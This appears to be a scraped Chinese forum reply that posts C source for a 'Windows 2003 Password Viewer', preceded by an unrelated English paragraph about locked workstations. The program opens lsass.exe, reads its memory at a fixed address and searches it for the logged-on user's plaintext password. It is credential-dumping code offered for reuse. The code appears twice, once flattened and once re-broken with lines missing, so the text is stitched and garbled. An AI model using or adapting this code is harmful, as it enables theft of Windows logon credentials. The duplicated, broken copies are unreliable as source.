There is no function you can call to determine whether the workstation is locked. To verify whether it is worth attempting to update your user interface, you can test whether or not your window is visible. This also has the advantage of identifying when the user cannot see your user interface because it is obscured by another window, minimized, or offscreen.
lz说的应该是象Findpass那样的程序 以前我在XP系统下用Winhex读取Lsass.exe的内存时候可以通过查找获得明文的密码 2003系统我没试过,听说是可以的。 这里有段代码,lz可以参考下://******************************************************************************** // Version: V1.0 // Coder: WinEggDrop // Date Release: 12/15/2004 // Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method // Used Is Pretty Unwise,But This May Be The Only Way To Review The // Logon User's Password On Windows 2003. // Test PlatForm: Windows 2003 // Compiled On: VC++ 6.0 //******************************************************************************** #include <stdio.h> #include <windows.h> #include <tlhelp32.h>#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliablechar Password[MAX_PATH] = {0}; // Store The Found Password// Function ProtoType Declaration //------------------------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID); int Search(char *Buffer,const UINT nSize); DWORD GetLsassPID(); BOOL Is2003(); //----------------------------------------------------------------------------------// End Of Fucntion ProtoType Declaration
int main() { DWORD PID = 0; printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n"); if (!Is2003()) // Check Out If The Box Is 2003 { printf("The Program Can't Only Run On Windows 2003 Platform\n"); return -1; } PID = GetLsassPID(); // Get The Lsass.exe PID if (PID == 0) // Fail To Get PID If Returning Zerom { return -1; } FindPassword(PID); // Find The Password From Lsass.exe Memory return 0; } // End main()//---------------------------------------------------------------------------------- // Purpose: Search The Memory & Try To Get The Password // Return Type: int // Parameters: // In: char *Buffer --> The Memory Buffer To Search // Out: const UINT nSize --> The Size Of The Memory Buffer // Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure", // Since The Password Is Near The Above Location,But It's Not Always True That // We Will Find The Magic String,Or Even We Find It,The Password May Be Located // At Some Other Place.We Only Look For Luck //---------------------------------------------------------------------------------- int Search(char *Buffer,const UINT nSize) { UINT OffSet = 0; UINT i = 0; UINT j = 0 ; UINT Count = 0; if (Buffer == NULL) { return -1; } for (i = 0 ; i < nSize ; i++) { /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate The Magic String,We Have To Do It Manually And Slowly */ if (Buffer[i] == 'L') { OffSet = 0; if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0) { OffSet += strlen("LocalSystem") + 1; if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0) { OffSet += strlen("Remote") + 1; if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0) { OffSet += strlen("Procedure") + 1; if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0) { i += OffSet; break; } } } } } } if (i < nSize) { ZeroMemory(Password,sizeof(Password)); for (; i < nSize ; i++) { if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0) { /* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In That Way */ j = i + 7; for (; j < nSize; j += 2) { if (Buffer[j] > 0) { Password[Count++] = Buffer[j]; } else { break; } } return i + 7; // One Flag To Indicate We Find The Password } } } return -1; // Well,We Fail To Find The Password,And This Always Happens } // End Search//---------------------------------------------------------------------------------- // Purpose: To Get The Lsass.exe PID // Return Type: DWORD // Parameters: None //---------------------------------------------------------------------------------- DWORD GetLsassPID() { HANDLE hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if( hProcessSnap == INVALID_HANDLE_VALUE ) { printf("Fail To Create Snap Shot\n"); return 0; } pe32.dwSize = sizeof(PROCESSENTRY32); if( !Process32First(hProcessSnap, &pe32)) { CloseHandle(hProcessSnap); // Must clean up the snapshot object! return 0; } do { if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0) { PID = pe32.th32ProcessID; break; } }while(Process32Next( hProcessSnap, &pe32)); CloseHandle( hProcessSnap); return PID; } // End GetLsassPID()
// Purpose: To Find The Password // Return Type: BOOLEAN // Parameters: // In: DWORD PID -> The Lsass.exe's PID //---------------------------------------------------------------------------------- BOOL FindPassword(DWORD PID) { HANDLE hProcess = NULL; char Buffer[5 * 1024] = {0}; DWORD ByteGet = 0; int Found = -1; hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process if (hProcess == NULL) { printf("Fail To Open Process\n"); return FALSE; } if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe { printf("Fail To Read Memory\n"); CloseHandle(hProcess); return FALSE; } CloseHandle(hProcess); Found = Search(Buffer,ByteGet); // Search The Password if (Found >= 0) // We May Find The Password { if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not { printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password); } } else { printf("Fail To Find The Password\n"); } return TRUE; } // End FindPassword//------------------------------------------------------------------------------------ // Purpose: Check If The Box Is Windows 2003 // Return Type: BOOLEAN // Parameters: None //------------------------------------------------------------------------------------ BOOL Is2003() { OSVERSIONINFOEX osvi; BOOL b0sVersionInfoEx; ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX)); osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX); if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi))) { osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); } return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2); } // End Is2003() // End Of File
以前我在XP系统下用Winhex读取Lsass.exe的内存时候可以通过查找获得明文的密码
2003系统我没试过,听说是可以的。
这里有段代码,lz可以参考下://********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
// Used Is Pretty Unwise,But This May Be The Only Way To Review The
// Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliablechar Password[MAX_PATH] = {0}; // Store The Found Password// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID);
int Search(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL Is2003();
//----------------------------------------------------------------------------------// End Of Fucntion ProtoType Declaration
{
DWORD PID = 0;
printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n"); if (!Is2003()) // Check Out If The Box Is 2003
{
printf("The Program Can't Only Run On Windows 2003 Platform\n");
return -1;
} PID = GetLsassPID(); // Get The Lsass.exe PID if (PID == 0) // Fail To Get PID If Returning Zerom
{
return -1;
} FindPassword(PID); // Find The Password From Lsass.exe Memory
return 0;
}
// End main()//----------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To Search
// Out: const UINT nSize --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
// Since The Password Is Near The Above Location,But It's Not Always True That
// We Will Find The Magic String,Or Even We Find It,The Password May Be Located
// At Some Other Place.We Only Look For Luck
//----------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
} for (i = 0 ; i < nSize ; i++)
{
/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
The Magic String,We Have To Do It Manually And Slowly
*/
if (Buffer[i] == 'L')
{
OffSet = 0;
if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
{
OffSet += strlen("LocalSystem") + 1;
if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
{
OffSet += strlen("Remote") + 1;
if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
{
OffSet += strlen("Procedure") + 1;
if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
{
i += OffSet;
break;
}
}
}
}
}
}
if (i < nSize)
{
ZeroMemory(Password,sizeof(Password));
for (; i < nSize ; i++)
{
if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)
{
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
That Way
*/
j = i + 7;
for (; j < nSize; j += 2)
{
if (Buffer[j] > 0)
{
Password[Count++] = Buffer[j];
}
else
{
break;
}
}
return i + 7; // One Flag To Indicate We Find The Password
}
}
}
return -1; // Well,We Fail To Find The Password,And This Always Happens
}
// End Search//----------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None
//----------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap Shot\n");
return 0;
} pe32.dwSize = sizeof(PROCESSENTRY32); if( !Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return 0;
} do
{
if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
{
PID = pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap, &pe32)); CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()
// Return Type: BOOLEAN
// Parameters:
// In: DWORD PID -> The Lsass.exe's PID
//----------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
char Buffer[5 * 1024] = {0};
DWORD ByteGet = 0;
int Found = -1; hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process
if (hProcess == NULL)
{
printf("Fail To Open Process\n");
return FALSE;
} if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe
{
printf("Fail To Read Memory\n");
CloseHandle(hProcess);
return FALSE;
} CloseHandle(hProcess); Found = Search(Buffer,ByteGet); // Search The Password
if (Found >= 0) // We May Find The Password
{
if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
{
printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);
}
}
else
{
printf("Fail To Find The Password\n");
}
return TRUE;
}
// End FindPassword//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX); if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File